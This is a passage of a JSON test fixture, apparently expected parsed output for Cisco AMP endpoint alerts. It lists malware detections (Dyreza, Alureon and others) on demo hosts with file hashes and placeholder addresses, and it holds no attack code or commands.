{ + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 256516, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 257835, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667575396565008", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 971000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667575396565000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 261804, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257843180601413", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 536000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257843180601000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 263122, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f5:8f:96:c3:53:1c" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648166, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f5:8f:96:c3:53:1c" + ], + "cisco.amp.timestamp_nanoseconds": 82375000, + "event.action": "Uninstall", + "event.dataset": "cisco.amp", + "event.id": 834324, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", + "input.type": "log", + "log.offset": 264441, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257791640993860", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 898000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257791640994000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 265349, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 901000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257740101386000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 266668, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:13.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 874000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257688561779000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 267987, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 236000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257641317138000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 269306, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667317698527247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 641000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667317698527000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 270625, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 224000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257589777531000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 274588, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257564007727000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 275907, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257512468120000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 277226, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:20.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257460928512000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 278545, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5825617812646789000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", + "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", + "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", + "file.name": "5A.tmp", + "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 279864, + "process.hash.md5": "60784f891563fb1b767f70117fc2428f", + "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", + "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", + "process.name": "spoolsv.exe", + "process.pid": 1480, + "related.hash": [ + "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", + "bfcc0861c7fb965c1f7473d3dc42cff6", + "420da91c3199993c9f245b21ea060b69d7ecfd49" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5825617808351822000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", + "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", + "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "file.name": "59.tmp", + "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 287092, + "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "process.name": "tdss.exe", + "process.pid": 3728, + "related.hash": [ + "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "4a052246c5551e83d2d55f80e72f03eb", + "bc29f1e8460915596e1dcafd0c92d6309457d149" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + 